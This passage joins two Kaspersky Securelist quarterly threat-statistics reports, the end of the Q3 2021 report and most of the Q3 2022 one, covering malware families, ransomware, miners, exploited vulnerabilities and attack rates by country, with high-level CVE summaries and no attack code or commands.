We already covered [similar vulnerabilities](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>): for instance, they were used in the HAFNIUM attacks, which also targeted Microsoft Exchange Server.\n\nAs before, server attacks relying on password brute-forcing against various network services, such as MS SQL, RDP, etc., stand out among the Q3 2021 network threats. Attacks using the EternalBlue, EternalRomance and similar exploits are as popular as ever. Among the new ones is a serious vulnerability in Atlassian Confluence Server ([CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>)), a product widely used in corporate environments, which enables remote code execution through injection into Object-Graph Navigation Language (OGNL) expressions. Pulse Connect Secure was also found to contain the vulnerability [CVE-2021-22937](<https://nvd.nist.gov/vuln/detail/CVE-2021-22937>), which, however, requires the administrator password to be exploited.\n\n### Statistics\n\nAs before, exploits for Microsoft Office vulnerabilities still led the pack in Q3 2021 (60.68%). They remain popular because of the large user base, most of whom still run older versions of the software, which makes the attackers' job much easier. The share of Microsoft Office exploits increased by almost 5 p.p. from the previous quarter. Among other things, this was because the new vulnerability [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>) was discovered in the wild and instantly put to use to compromise user machines. An attacker can exploit it through the standard functionality that allows Office documents to download templates, implemented with the help of special ActiveX components. The processed data is not properly validated during this operation, so arbitrary malicious code can be downloaded. 
As you are reading this, the relevant security update is already available.\n\nThe way individual Microsoft Office vulnerabilities are ranked by the number of detections does not change much with time: the first positions are still shared by [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), with another popular vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) not far behind. We already covered these many times \u2014 all the above-mentioned vulnerabilities execute commands on behalf of the user and infect the system.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151038/09-en-malware-report-q3-2021-pc-graphs.png>))_\n\nThe share of exploits for the popular browsers fell by 3 p.p. from the previous reporting period to 25.57% in Q3. In the three months covered by the report several vulnerabilities were discovered in Google Chrome browser and its script engine V8 \u2014 some of them in the wild. Among these, the following JavaScript engine vulnerabilities stand out: [CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>) (type confusion error corrupting the heap memory), [CVE-2021-30632](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) (out-of-bounds write in V8) and [CVE-2021-30633](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) (use-after-free in Indexed DB). All these can potentially allow remote execution of code. But it should be remembered that for modern browsers a chain of several exploits is often required to leave the sandbox and secure broader privileges in the system. 
It should also be noted that, with the Google Chromium codebase (in particular the Blink component and V8) being used in many browsers, any newly discovered Google Chrome vulnerability automatically makes other browsers built on its open codebase vulnerable as well.\n\nThird place is held by Google Android vulnerabilities (5.36%), 1 p.p. down from the previous period. They are followed by exploits for Adobe Flash (3.41%), whose share is gradually decreasing. The platform is no longer supported but is still used by many users, which is reflected in our statistics.\n\nOur ranking is rounded out by Java vulnerabilities (2.98%), whose share is also noticeably lower, and Adobe PDF (1.98%).\n\n## Attacks on macOS\n\nQ3 2021 will be remembered for two interesting revelations. The first is the use of [malware code targeting macOS](<https://securelist.com/wildpressure-targets-macos/103072/>) as part of the WildPressure campaign. The second is the detailed [review of previously unknown FinSpy implants](<https://securelist.com/finspy-unseen-findings/104322/>) for macOS.\n\nAs for the most widespread threats detected by Kaspersky security solutions for macOS, most positions in our Top 20 ranking are occupied by various adware apps. 
Among the noteworthy ones is Monitor.OSX.HistGrabber.b (second place on the list) \u2014 this potentially unwanted software sends user browser history to its owners' servers.\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.j | 13.22 \n2 | Monitor.OSX.HistGrabber.b | 11.19 \n3 | AdWare.OSX.Pirrit.ac | 10.31 \n4 | AdWare.OSX.Pirrit.o | 9.32 \n5 | AdWare.OSX.Bnodlero.at | 7.43 \n6 | Trojan-Downloader.OSX.Shlayer.a | 7.22 \n7 | AdWare.OSX.Pirrit.gen | 6.41 \n8 | AdWare.OSX.Cimpli.m | 6.29 \n9 | AdWare.OSX.Bnodlero.bg | 6.13 \n10 | AdWare.OSX.Pirrit.ae | 5.96 \n11 | AdWare.OSX.Agent.gen | 5.65 \n12 | AdWare.OSX.Pirrit.aa | 5.39 \n13 | Trojan-Downloader.OSX.Agent.h | 4.49 \n14 | AdWare.OSX.Bnodlero.ay | 4.18 \n15 | AdWare.OSX.Ketin.gen | 3.56 \n16 | AdWare.OSX.Ketin.h | 3.46 \n17 | Backdoor.OSX.Agent.z | 3.45 \n18 | Trojan-Downloader.OSX.Lador.a | 3.06 \n19 | AdWare.OSX.Bnodlero.t | 2.80 \n20 | AdWare.OSX.Bnodlero.ax | 2.64 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151108/10-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 3.05 \n2 | Spain | 2.85 \n3 | India | 2.70 \n4 | Mexico | 2.59 \n5 | Canada | 2.52 \n6 | Italy | 2.42 \n7 | United States | 2.37 \n8 | Australia | 2.23 \n9 | Brazil | 2.21 \n10 | United Kingdom | 2.12 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000). 
\n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q3 2021, France led with the highest percentage of attacked users of Kaspersky security solutions for macOS (3.05%), with the potentially unwanted software Monitor.OSX.HistGrabber as the prevalent threat there. Spain and India came in second and third, with the Pirrit family adware as their prevalent threat.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3 2021, most of the devices that attacked Kaspersky honeypots did so using the Telnet protocol. Just under a quarter of all devices attempted to brute-force our traps via SSH.\n\nTelnet | 76.55% \n---|--- \nSSH | 23.45% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q3 2021_\n\nThe statistics for working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 84.29% \n---|--- \nSSH | 15.71% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2021_\n\n**Top 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 39.48 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 20.67 \n3 | Backdoor.Linux.Agent.bc | 10.00 \n4 | Backdoor.Linux.Mirai.ba | 8.65 \n5 | Trojan-Downloader.Shell.Agent.p | 3.50 \n6 | Backdoor.Linux.Gafgyt.a | 2.52 \n7 | RiskTool.Linux.BitCoinMiner.b | 1.69 \n8 | Backdoor.Linux.Ssh.a | 1.23 \n9 | Backdoor.Linux.Mirai.ad | 1.20 \n10 | HackTool.Linux.Sshbru.s | 1.12 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT threat statistics are published in our Q3 2021 DDoS report: <https://securelist.com/ddos-attacks-in-q3-2021/104796/#attacks-on-iot-honeypots>\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are 
downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that serve as sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q3 2021, Kaspersky solutions blocked 1,098,968,315 attacks launched from online resources located across the globe. Web Anti-Virus recognized 289,196,912 unique URLs as malicious.\n\n_Distribution of web-attack sources by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151328/13-en-malware-report-q3-2021-pc-graphs-1.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the **Malware** class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

| | **Country**\* | **% of attacked users**\*\* |
|---|---|---|
| 1 | Tunisia | 27.15 |
| 2 | Syria | 17.19 |
| 3 | Yemen | 17.05 |
| 4 | Nepal | 15.27 |
| 5 | Algeria | 15.27 |
| 6 | Macao | 14.83 |
| 7 | Belarus | 14.50 |
| 8 | Moldova | 13.91 |
| 9 | Madagascar | 13.80 |
| 10 | Serbia | 13.48 |
| 11 | Libya | 13.13 |
| 12 | Mauritania | 13.06 |
| 13 | Mongolia | 13.06 |
| 14 | India | 12.89 |
| 15 | Palestine | 12.79 |
| 16 | Sri Lanka | 12.76 |
| 17 | Ukraine | 12.39 |
| 18 | Estonia | 11.61 |
| 19 | Tajikistan | 11.44 |
| 20 | Qatar | 11.14 |

_\* Excluded are countries with relatively few Kaspersky users (under 10,000)._

_\*\* Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._

_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._

On average during the quarter, 8.72% of computers of Internet users worldwide were subjected to at least one **Malware**-class web attack.

_Geography of web-based malware attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151358/14-en-malware-report-q3-2021-pc-graphs.png>))_

## Local threats

_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._

In Q3 2021, our File Anti-Virus detected **62,577,326** malicious and potentially unwanted objects.

### Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that this rating only includes attacks by malicious programs that fall under the **Malware** class; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| | **Country**\* | **% of attacked users**\*\* |
|---|---|---|
| 1 | Turkmenistan | 47.42 |
| 2 | Yemen | 44.27 |
| 3 | Ethiopia | 42.57 |
| 4 | Tajikistan | 42.51 |
| 5 | Uzbekistan | 40.41 |
| 6 | South Sudan | 40.15 |
| 7 | Afghanistan | 40.07 |
| 8 | Cuba | 38.20 |
| 9 | Bangladesh | 36.49 |
| 10 | Myanmar | 35.96 |
| 11 | Venezuela | 35.20 |
| 12 | China | 35.16 |
| 13 | Syria | 34.64 |
| 14 | Madagascar | 33.49 |
| 15 | Rwanda | 33.06 |
| 16 | Sudan | 33.01 |
| 17 | Benin | 32.68 |
| 18 | Burundi | 31.88 |
| 19 | Laos | 31.70 |
| 20 | Cameroon | 31.28 |

_\* Excluded are countries with relatively few Kaspersky users (under 10,000)._

_\*\* Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._

_Geography of local infection attempts, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151433/15-en-malware-report-q3-2021-pc-graphs.png>))_

On average worldwide, **Malware**-class local threats were recorded on 15.14% of users' computers at least once during the quarter. Russia scored 14.64% in this rating.

_Source: "IT threat evolution in Q3 2021. PC statistics", Securelist, published 2021-11-26 (<https://securelist.com/it-threat-evolution-in-q3-2021-pc-statistics/104982/>)._

 * [IT threat evolution in Q3 2022](<https://securelist.com/it-threat-evolution-q3-2022/107957/>)
 * **IT threat evolution in Q3 2022. Non-mobile statistics**
 * [IT threat evolution in Q3 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)

_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._

## Quarterly figures

According to Kaspersky Security Network, in Q3 2022:

 * Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.
 * Web Anti-Virus recognized 251,288,987 unique URLs as malicious.
 * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 99,989 unique users.
 * Ransomware attacks were defeated on the computers of 72,941 unique users.
 * Our File Anti-Virus detected 49,275,253 unique malicious and potentially unwanted objects.

## Financial threats

### Number of users attacked by banking malware

In Q3 2022, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 99,989 unique users.

_Number of unique users attacked by financial malware, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154318/01-en-malware-report-q3-2022-pc-stat.png>))_

### TOP 10 banking malware families

| | **Name** | **Verdicts** | **%**\* |
|---|---|---|---|
| 1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 33.2 |
| 2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.2 |
| 3 | IcedID | Trojan-Banker.Win32.IcedID | 10.0 |
| 4 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.8 |
| 5 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 5.8 |
| 6 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.1 |
| 7 | RTM | Trojan-Banker.Win32.RTM | 1.9 |
| 8 | Danabot | Trojan-Banker.Win32.Danabot | 1.4 |
| 9 | Tinba/TinyBanker | Trojan-Banker.Win32.Tinba | 1.4 |
| 10 | Gozi | Trojan-Banker.Win32.Gozi | 1.1 |

_\* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._

### Geography of financial malware attacks

**TOP 10 countries and territories by share of attacked users**

| | **Country or territory**\* | **%**\*\* |
|---|---|---|
| 1 | Turkmenistan | 4.7 |
| 2 | Afghanistan | 4.6 |
| 3 | Paraguay | 2.8 |
| 4 | Tajikistan | 2.8 |
| 5 | Yemen | 2.3 |
| 6 | Sudan | 2.3 |
| 7 | China | 2.0 |
| 8 | Switzerland | 2.0 |
| 9 | Egypt | 1.9 |
| 10 | Venezuela | 1.8 |

_\* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._

_\*\* Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._

## Ransomware programs

### Quarterly trends and highlights

The third quarter of 2022 saw the builder for LockBit, a well-known ransomware, [leaked online](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-builder-leaked-online-by-angry-developer-/>). LockBit themselves attributed the leak to one of their developers' personal initiative, not to the group being hacked. One way or another, the LockBit 3.0 build kit is now accessible to the broader cybercriminal community. As happened with other ransomware families in the past, such as Babuk and Conti, Trojan builds generated with the leaked builder began to serve other groups unrelated to LockBit. One example was Bloody/Bl00dy, [spotted back in May](<https://www.bleepingcomputer.com/news/security/leaked-lockbit-30-builder-used-by-bl00dy-ransomware-gang-in-attacks/>). A borrower rather than a creator, this group added the freshly available LockBit to its arsenal in September 2022.

Mass attacks on NAS (network attached storage) devices continue. QNAP issued warnings about Checkmate and Deadbolt infections in Q3 2022. The [former](<https://www.qnap.com/en/security-advisory/QSA-22-21>) threatened files accessible from the internet over the SMB protocol and protected by a weak account password. The latter [attacked](<https://www.qnap.com/en/security-news/2022/take-immediate-action-to-update-photo-station-to-the-latest-available-version>) devices that had a vulnerable version of the Photo Station software installed. Threats that target NAS remain prominent, so we recommend keeping these devices inaccessible from the internet to ensure maximum safety of your data.

The United States Department of Justice [announced](<https://www.justice.gov/opa/pr/justice-department-seizes-and-forfeits-approximately-500000-north-korean-ransomware-actors>) that it had teamed up with the FBI to seize about $500,000 paid as ransom after a Maui ransomware attack. The Trojan was likely [used](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) by the North Korean operators Andariel. The DOJ said victims had started getting their money back.

The creators of the little-known AstraLocker and Yashma ransomware [published](<https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/>) decryptors and stopped spreading both of them. The hackers provided no explanation for the move, but it appeared to be related to an increase in media coverage.

### Number of new modifications

In Q3 2022, we detected 17 new ransomware families and 14,626 new modifications of this malware type. More than 11,000 of those were assigned the verdict Trojan-Ransom.Win32.Crypmod, which took sixth place in our rankings of the most widespread ransomware Trojans.

_Number of new ransomware modifications, Q3 2021 — Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154421/03-en-ru-es-malware-report-q3-2022-pc-stat.png>))_

### Number of users attacked by ransomware Trojans

In Q3 2022, Kaspersky products and technologies protected 72,941 users from ransomware attacks.

_Number of unique users attacked by ransomware Trojans, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154500/04-en-malware-report-q3-2022-pc-stat.png>))_

### Geography of attacked users

**TOP 10 countries and territories attacked by ransomware Trojans**

| | **Country or territory**\* | **%**\*\* |
|---|---|---|
| 1 | Bangladesh | 1.66 |
| 2 | Yemen | 1.30 |
| 3 | South Korea | 0.98 |
| 4 | Taiwan | 0.77 |
| 5 | Mozambique | 0.64 |
| 6 | China | 0.52 |
| 7 | Colombia | 0.43 |
| 8 | Nigeria | 0.40 |
| 9 | Pakistan | 0.39 |
| 10 | Venezuela | 0.32 |

_\* Excluded are countries with relatively few Kaspersky users (under 50,000)._

_\*\* Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._

### TOP 10 most common families of ransomware Trojans

| | **Name** | **Verdicts**\* | **Percentage of attacked users**\*\* |
|---|---|---|---|
| 1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 |
| 2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 |
| 3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 |
| 4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 |
| 5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 |
| 6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.46 |
| 7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 |
| 8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 |
| 9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 |
| 10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 |

_\* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data._

_\*\* Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._

## Miners

### Number of new miner modifications

In Q3 2022, Kaspersky systems detected 153,773 new miner modifications. More than 140,000 of these were found in July and August; combined with June's figure of more than 35,000, this suggests that miner creators kept themselves abnormally busy this past summer.

_Number of new miner modifications, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154533/06-en-malware-report-q3-2022-pc-stat.png>))_

### Number of users attacked by miners

In Q3, we detected attacks that used miners on the computers of 432,363 unique users of Kaspersky products worldwide. A quieter period from late spring through the early fall was followed by another increase in activity.

_Number of unique users attacked by miners, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154601/07-en-malware-report-q3-2022-pc-stat.png>))_

### Geography of miner attacks

**TOP 10 countries and territories attacked by miners**

| | **Country or territory**\* | **%**\*\* |
|---|---|---|
| 1 | Ethiopia | 2.38 |
| 2 | Kazakhstan | 2.13 |
| 3 | Uzbekistan | 2.01 |
| 4 | Rwanda | 1.93 |
| 5 | Tajikistan | 1.83 |
| 6 | Venezuela | 1.78 |
| 7 | Kyrgyzstan | 1.73 |
| 8 | Mozambique | 1.57 |
| 9 | Tanzania | 1.56 |
| 10 | Ukraine | 1.54 |

_\* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000)._

_\*\* Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._

## Vulnerable applications used by criminals during cyberattacks

### Quarterly highlights

Q3 2022 was remembered for a series of vulnerabilities discovered in various software products. Let's begin with Microsoft Windows and some of its components. Researchers found new vulnerabilities that affected the CLFS driver: [CVE-2022-30220](<https://nvd.nist.gov/vuln/detail/CVE-2022-30220>), along with [CVE-2022-35803](<https://nvd.nist.gov/vuln/detail/CVE-2022-35803>) and [CVE-2022-37969](<https://nvd.nist.gov/vuln/detail/CVE-2022-37969>), both encountered in the wild. By manipulating Common Log File System data in a specific way, an attacker can make the kernel write their own data to arbitrary memory addresses, allowing cybercriminals to hijack kernel control and elevate their privileges in the system. Several vulnerabilities were discovered in the Print Spooler service: [CVE-2022-22022](<https://nvd.nist.gov/vuln/detail/CVE-2022-22022>), [CVE-2022-30206](<https://nvd.nist.gov/vuln/detail/CVE-2022-30206>), and [CVE-2022-30226](<https://nvd.nist.gov/vuln/detail/CVE-2022-30226>). These allow elevating system privileges through a series of manipulations while installing a printer. Serious vulnerabilities were also discovered in the Client/Server Runtime Subsystem (CSRSS), an essential Windows component. Some of these can be exploited for privilege escalation ([CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047>), [CVE-2022-22049](<https://nvd.nist.gov/vuln/detail/CVE-2022-22049>), and [CVE-2022-22026](<https://nvd.nist.gov/vuln/detail/CVE-2022-22026>)), while [CVE-2022-22038](<https://nvd.nist.gov/vuln/detail/CVE-2022-22038>) affects the remote procedure call (RPC) protocol, allowing an attacker to execute arbitrary code remotely. A series of critical vulnerabilities were discovered in the graphics subsystem, including [CVE-2022-22034](<https://nvd.nist.gov/vuln/detail/CVE-2022-22034>) and [CVE-2022-35750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35750>), which can also be exploited for privilege escalation. Note that most of the above vulnerabilities require an attacker to already have a foothold in the system before their malware can be run. The Microsoft Support Diagnostic Tool (MSDT) was found to contain a further two vulnerabilities, [CVE-2022-34713](<https://nvd.nist.gov/vuln/detail/CVE-2022-34713>) and [CVE-2022-35743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35743>), which can be exploited to take advantage of security flaws in the link handler to remotely run commands in the system.

Most of the network threats detected in Q3 2022 were again attacks associated with [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) passwords for Microsoft SQL Server, RDP, and other services. Network attacks on vulnerable versions of Windows via EternalBlue, EternalRomance, and other exploits were still common. Attempts at exploiting network services and other software via vulnerabilities in the Log4j library ([CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), and [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/cve-2021-45105>)) also continued. Several vulnerabilities were found in the Microsoft Windows Network File System (NFS) driver. These are [CVE-2022-22028](<https://nvd.nist.gov/vuln/detail/CVE-2022-22028>), which can lead to leakage of confidential information, as well as [CVE-2022-22029](<https://nvd.nist.gov/vuln/detail/CVE-2022-22029>), [CVE-2022-22039](<https://nvd.nist.gov/vuln/detail/CVE-2022-22039>) and [CVE-2022-34715](<https://nvd.nist.gov/vuln/detail/CVE-2022-34715>), which a cybercriminal can use to remotely execute arbitrary code in the system — in kernel context — by using a specially crafted network packet. The TCP/IP stack was found to contain the critical vulnerability [CVE-2022-34718](<https://nvd.nist.gov/vuln/detail/CVE-2022-34718>), which in theory allows a target system to be exploited remotely by taking advantage of errors in the IPv6 protocol handler. Finally, it is worth mentioning the [CVE-2022-34724](<https://nvd.nist.gov/vuln/detail/CVE-2022-34724>) vulnerability, which affects Windows DNS Server and can lead to denial of service if exploited.

Two vulnerabilities in Microsoft Exchange Server, [CVE-2022-41040](<https://nvd.nist.gov/vuln/detail/CVE-2022-41040>) and [CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082>), received considerable media coverage. They were collectively dubbed "ProxyNotShell" in reference to the earlier, already patched ProxyShell vulnerabilities, which have a similar exploitation technique. Researchers discovered the ProxyNotShell exploits while investigating an APT attack: an authenticated user can use the loopholes to elevate their privileges and run arbitrary code on an MS Exchange server. As a result, the attacker can steal confidential data, encrypt critical files on the server to extort money from the victim, etc.

### Vulnerability statistics

In Q3 2022, malicious Microsoft Office documents again accounted for the greatest number of detections — 80% of the exploits we discovered, although the number decreased slightly compared to Q2. Most of these detections were triggered by exploits that targeted the following vulnerabilities:

 * [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), in the Equation Editor component, which allow corrupting the application memory when processing formulas, and subsequently running arbitrary code in the system;
 * [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), which allows downloading and running malicious script files;
 * [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>), also known as "Follina", which exploits a flaw in the Microsoft Windows Support Diagnostic Tool (MSDT) for running arbitrary programs in a vulnerable system even in Protected Mode or when macros are disabled;
 * [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which allows an attacker to deploy malicious code using a special ActiveX template due to inadequate input validation.

_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154631/09-en-malware-report-q3-2022-pc-stat.png>))_

These were followed by exploits that target browsers. Their share amounted to 6%, or 1% higher than in Q2. We will list the most serious vulnerabilities, all of them targeting Google Chrome:

 * [CVE-2022-2294](<https://nvd.nist.gov/vuln/detail/CVE-2022-2294>), in the WebRTC component, which leads to buffer overflow;
 * [CVE-2022-2624](<https://nvd.nist.gov/vuln/detail/CVE-2022-2624>), which exploits a memory overflow error in the PDF viewing component;
 * [CVE-2022-2295](<https://nvd.nist.gov/vuln/detail/CVE-2022-2295>), a Type Confusion error that allows an attacker to corrupt the browser process memory remotely and run arbitrary code in a sandbox;
 * [CVE-2022-3075](<https://nvd.nist.gov/vuln/detail/CVE-2022-3075>), an error linked to inadequate input validation in the Mojo interprocess communication component in Google Chromium-based browsers that allows escaping the sandbox and running arbitrary commands in the system.

Since many modern browsers are based on Google Chromium, attackers can often take advantage of the shared vulnerabilities to attack the other browsers as long as they run on the same engine.

A series of vulnerabilities were identified in Microsoft Edge. Worth noting is [CVE-2022-33649](<https://nvd.nist.gov/vuln/detail/CVE-2022-33649>), which allows running an application in the system by circumventing the browser protections; [CVE-2022-33636](<https://nvd.nist.gov/vuln/detail/CVE-2022-33636>) and [CVE-2022-35796](<https://nvd.nist.gov/vuln/detail/CVE-2022-35796>), Race Condition vulnerabilities that ultimately allow a sandbox escape; and [CVE-2022-38012](<https://nvd.nist.gov/vuln/detail/CVE-2022-38012>), which exploits an application memory corruption error, with similar results.

The Mozilla Firefox browser was found to contain vulnerabilities associated with memory corruption, which allow running arbitrary code in the system: [CVE-2022-38476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38476>), a Race Condition vulnerability that leads to a subsequent Use-After-Free scenario, and the similar vulnerabilities [CVE-2022-38477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38477>) and [CVE-2022-38478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38478>), which exploit memory corruption. As you can see from our reports, browsers are an attractive target for cybercriminals, as these are widely used and allow attackers to infiltrate the system remotely and virtually unbeknownst to the user. That said, browser vulnerabilities are not simple to exploit, as attackers often have to use a chain of vulnerabilities to work around the protections of modern browsers.

The remaining positions in our rankings were distributed among Android (5%) and Java (4%) exploits. The fifth-highest number of exploits (3%) targeted Adobe Flash, a technology that is obsolete but remains in use. Rounding out the rankings with 2% were exploits spread through PDF documents.

## Attacks on macOS

The third quarter of 2022 brought with it a significant number of interesting macOS malware discoveries. In particular, researchers found [Operation In(ter)ception](<https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/>), a campaign operated by the North Korean Lazarus group, which targets macOS users looking for cryptocurrency jobs. The malware was disguised as documents containing summaries of positions at Coinbase and Crypto.com.

[CloudMensis](<https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/>), a spy program written in Objective-C, used cloud storage services as C&C servers and [shared several characteristics](<https://twitter.com/ESETresearch/status/1575103839115804672>) with the RokRAT Windows malware operated by ScarCruft.

The creators of XCSSET [adapted](<https://www.sentinelone.com/blog/xcsset-malware-update-macos-threat-actors-prepare-for-life-without-python/>) their toolset to macOS Monterey and migrated from Python 2 to Python 3.

In Q3, cybercrooks also began to make use of open-source tools in their attacks. July saw the discovery of two campaigns that used a fake [VPN application](<https://www.sentinelone.com/blog/from-the-front-lines-new-macos-covid-malware-masquerades-as-apple-wears-face-of-apt/>) and fake [Salesforce updates](<https://twitter.com/ESETresearch/status/1547943014860894210>), both built on the Sliver framework.

